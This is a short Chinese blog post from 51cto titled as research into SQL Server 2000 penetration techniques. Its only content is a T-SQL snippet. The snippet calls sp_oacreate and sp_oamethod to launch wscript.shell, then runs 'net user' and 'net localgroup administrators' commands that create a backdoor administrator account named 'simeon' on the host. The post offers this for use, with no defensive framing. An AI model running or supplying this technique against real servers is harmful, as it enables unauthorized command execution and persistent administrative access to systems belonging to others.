注册 | 登录 忘记密码? 51cto首页 | 博客 | 论坛 | 招聘
热点文章 利用IPSec实现网络安全之..
 帮助

SQL Server 2000渗透技术研究


2008-05-28 15:48:57
 标签:技术 研究 渗透   [推送到技术圈]

版权声明:原创作品,如需转载,请与作者联系。否则将追究法律责任。
使用oacreate以及oamethod来执行命令。
declare @shell int
exec sp_oacreate 'wscript.shell',@shell out
exec sp_oamethod @shell ,'run',null,'net user simeon simeon /add'
exec sp_oamethod @shell ,'run',null,'net localgroup administrators simeon /add'

本文出自 “simeon的技术专栏” 博客,转载请与作者联系!





    文章评论
 
 

发表评论

昵   称:
验证码:  点击图片可刷新验证码  博客过2级,无需填写验证码
内   容: